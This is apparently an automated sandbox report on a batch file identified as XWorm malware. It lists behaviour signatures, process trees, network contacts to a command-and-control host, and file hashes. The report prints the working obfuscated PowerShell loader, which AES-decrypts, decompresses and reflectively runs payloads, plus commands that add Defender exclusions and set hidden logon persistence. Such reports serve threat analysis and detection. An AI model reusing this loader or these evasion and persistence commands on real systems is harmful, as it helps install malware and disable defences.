Analysis Overview
SHA256: 2b7272581314f0f4b3cd41c32cc9ebd5950eb1acf67601bd6bdf1365aacc8eab
Threat Level: Known bad
The file fixer.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Checks computer location settings
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-06-01 08:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-01 08:07
Reported: 2024-06-01 08:20
Platform: win10v2004-20240226-en
Max time kernel: 372s
Max time network: 381s
Command Line
Signatures
Detect Xworm Payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Xworm
Blocklisted process makes network request

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Command and Scripting Interpreter: PowerShell

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Checks computer location settings

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |

Drops startup file

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Adds Run key to start application

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Enumerates physical storage devices
Modifies registry class

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
```powershell
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){
    $aes_var=[System.Security.Cryptography.Aes]::Create();
    $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
    $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY=');
    $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg==');
    $decryptor_var=$aes_var.CreateDecryptor();
    $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
    $decryptor_var.Dispose();
    $aes_var.Dispose();
    $return_var;
}
function decompress_function($param_var){
    $mTcjO=New-Object System.IO.MemoryStream(,$param_var);
    $KQKvZ=New-Object System.IO.MemoryStream;
    $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress);
    $cfjXo.CopyTo($KQKvZ);
    $cfjXo.Dispose();
    $mTcjO.Dispose();
    $KQKvZ.Dispose();
    $KQKvZ.ToArray();
}
function execute_function($param_var,$param2_var){
    $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
    $WtyUv=$qAquB.EntryPoint;
    $WtyUv.Invoke($null, $param2_var);
}
$rJKpb = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';
$host.UI.RawUI.WindowTitle = $rJKpb;
$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);
foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}
$payloads_var=[string[]]$gPHGC.Split('\');
$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] ('')); "
```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_297_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_297.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_297.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_297.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
```powershell
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){
    $aes_var=[System.Security.Cryptography.Aes]::Create();
    $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
    $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY=');
    $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg==');
    $decryptor_var=$aes_var.CreateDecryptor();
    $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
    $decryptor_var.Dispose();
    $aes_var.Dispose();
    $return_var;
}
function decompress_function($param_var){
    $mTcjO=New-Object System.IO.MemoryStream(,$param_var);
    $KQKvZ=New-Object System.IO.MemoryStream;
    $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress);
    $cfjXo.CopyTo($KQKvZ);
    $cfjXo.Dispose();
    $mTcjO.Dispose();
    $KQKvZ.Dispose();
    $KQKvZ.ToArray();
}
function execute_function($param_var,$param2_var){
    $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
    $WtyUv=$qAquB.EntryPoint;
    $WtyUv.Invoke($null, $param2_var);
}
$rJKpb = 'C:\Users\Admin\AppData\Roaming\Windows_Log_297.bat';
$host.UI.RawUI.WindowTitle = $rJKpb;
$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);
foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}
$payloads_var=[string[]]$gPHGC.Split('\');
$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] ('')); "
```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | movie-buddy.gl.at.ply.gg | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 16.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
Files
memory/1640-0-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
memory/1640-1-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3vm3ul3q.rji.ps1

| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |

memory/1640-7-0x000001D5F6B00000-0x000001D5F6B22000-memory.dmp
memory/1640-12-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
memory/1640-13-0x000001D5F6CC0000-0x000001D5F6D04000-memory.dmp
memory/1640-14-0x000001D5F6FB0000-0x000001D5F7026000-memory.dmp
memory/1640-15-0x000001D5F49B0000-0x000001D5F49B8000-memory.dmp
memory/1640-16-0x000001D5F4A70000-0x000001D5F4A82000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

| Hash | Value |
| --- | --- |
| MD5 | 661739d384d9dfd807a089721202900b |
| SHA1 | 5b2c5d6a7122b4ce849dc98e79a7713038feac55 |
| SHA256 | 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf |
| SHA512 | 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8 |

C:\Users\Admin\AppData\Roaming\Windows_Log_297.vbs

| Hash | Value |
| --- | --- |
| MD5 | b8972a3e702cabd5cc34d1d7e2fd2287 |
| SHA1 | 45f85cb9bf26391187bffe385601d390fac49ed3 |
| SHA256 | baa37271dc1a02815295a20f341bce5fdd75ea50d40629b7687f145cdac9602a |
| SHA512 | 6e30718434cc370d2fa0e74f15e448b61efc17eef1bc5ed3402b3ad3bcae5e58de4d4a1b4ec8c64d828f5adb19c02f93fb432cf6082c5fe201915a5998fa9da8 |

C:\Users\Admin\AppData\Roaming\Windows_Log_297.bat

| Hash | Value |
| --- | --- |
| MD5 | 561c4ecf6ab3848d4d45ee983b5e6bd3 |
| SHA1 | 11e581a4bd84cad824f1dfce89962ab593b4193a |
| SHA256 | 2b7272581314f0f4b3cd41c32cc9ebd5950eb1acf67601bd6bdf1365aacc8eab |
| SHA512 | 1f6f460a4df29eb2a2b1f8bb932e549e51c4b257c3ce6808038d877a50fa3b8bccaea38aa900d00e9207a764f7aebfc0f9a7b5a07bc53a9902544e0d280ad716 |

memory/1640-36-0x00007FF8C0DB0000-0x00007FF8C0EDA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

| Hash | Value |
| --- | --- |
| MD5 | 005bc2ef5a9d890fb2297be6a36f01c2 |
| SHA1 | 0c52adee1316c54b0bfdc510c0963196e7ebb430 |
| SHA256 | 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d |
| SHA512 | f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22 |

memory/3120-47-0x0000016C02690000-0x0000016C026A2000-memory.dmp
memory/3120-48-0x0000016C026C0000-0x0000016C026D6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | a37d50419f9463557ba395bd8249f5b6 |
| SHA1 | 1e94df7e8e5250fe70562bf4d5538c63b3171851 |
| SHA256 | 7e12a5fac8da60dc67fd5d691fe4ee244d974c07d579488863558c9ebe14c1fa |
| SHA512 | cdd4fa55ab83ed2c68d8df444755a374899bb6b6f8fd829a014b3fc2f4e17536e357a288bc8209432aa2992a35f7d1df0e04c9bc82af46e04c89b69302f1a238 |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | 62623d22bd9e037191765d5083ce16a3 |
| SHA1 | 4a07da6872672f715a4780513d95ed8ddeefd259 |
| SHA256 | 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010 |
| SHA512 | 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992 |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | ef72c47dbfaae0b9b0d09f22ad4afe20 |
| SHA1 | 5357f66ba69b89440b99d4273b74221670129338 |
| SHA256 | 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f |
| SHA512 | 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4 |

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

| Hash | Value |
| --- | --- |
| MD5 | 10890cda4b6eab618e926c4118ab0647 |
| SHA1 | 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d |
| SHA256 | 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14 |
| SHA512 | a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221 |

memory/3120-99-0x0000016C026B0000-0x0000016C026BC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted: 2024-06-01 08:07
Reported: 2024-06-01 08:20
Platform: win11-20240508-en
Max time kernel: 280s
Max time network: 283s
Command Line
Signatures
Detect Xworm Payload

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |

Xworm
Blocklisted process makes network request

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Command and Scripting Interpreter: PowerShell

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Drops startup file

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Adds Run key to start application

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Enumerates physical storage devices
Delays execution with timeout.exe

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |

Modifies registry class

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |

Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
```powershell
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){
    $aes_var=[System.Security.Cryptography.Aes]::Create();
    $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
    $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY=');
    $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg==');
    $decryptor_var=$aes_var.CreateDecryptor();
    $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
    $decryptor_var.Dispose();
    $aes_var.Dispose();
    $return_var;
}
function decompress_function($param_var){
    $mTcjO=New-Object System.IO.MemoryStream(,$param_var);
    $KQKvZ=New-Object System.IO.MemoryStream;
    $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress);
    $cfjXo.CopyTo($KQKvZ);
    $cfjXo.Dispose();
    $mTcjO.Dispose();
    $KQKvZ.Dispose();
    $KQKvZ.ToArray();
}
function execute_function($param_var,$param2_var){
    $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
    $WtyUv=$qAquB.EntryPoint;
    $WtyUv.Invoke($null, $param2_var);
}
$rJKpb = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';
$host.UI.RawUI.WindowTitle = $rJKpb;
$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);
foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}
$payloads_var=[string[]]$gPHGC.Split('\');
$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] ('')); "
```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_446_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_446.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_446.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_446.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\system32\cmd.exe
```powershell
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){
    $aes_var=[System.Security.Cryptography.Aes]::Create();
    $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
    $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xFbfyI3XjQWVUv7xboImcLs4365/h1J6HXpT+B8FVLY=');
    $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UhZC0JRVJsnQjOGyRNg5Zg==');
    $decryptor_var=$aes_var.CreateDecryptor();
    $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
    $decryptor_var.Dispose();
    $aes_var.Dispose();
    $return_var;
}
function decompress_function($param_var){
    $mTcjO=New-Object System.IO.MemoryStream(,$param_var);
    $KQKvZ=New-Object System.IO.MemoryStream;
    $cfjXo=New-Object System.IO.Compression.GZipStream($mTcjO, [IO.Compression.CompressionMode]::Decompress);
    $cfjXo.CopyTo($KQKvZ);
    $cfjXo.Dispose();
    $mTcjO.Dispose();
    $KQKvZ.Dispose();
    $KQKvZ.ToArray();
}
function execute_function($param_var,$param2_var){
    $qAquB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
    $WtyUv=$qAquB.EntryPoint;
    $WtyUv.Invoke($null, $param2_var);
}
$rJKpb = 'C:\Users\Admin\AppData\Roaming\Windows_Log_446.bat';
$host.UI.RawUI.WindowTitle = $rJKpb;
$UjBCO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rJKpb).Split([Environment]::NewLine);
foreach ($NfqQG in $UjBCO) { if ($NfqQG.StartsWith('CEoZgkKPGlnZzsVdPujr')) { $gPHGC=$NfqQG.Substring(20); break; }}
$payloads_var=[string[]]$gPHGC.Split('\');
$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] ('')); "
```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB10D.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 147.185.221.16:40572 | movie-buddy.gl.at.ply.gg | tcp |
Files
memory/3644-0-0x00007FFF96E03000-0x00007FFF96E05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ixb342mi.dah.ps1

| Hash | Value |
| --- | --- |
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |

memory/3644-9-0x000002279E690000-0x000002279E6B2000-memory.dmp
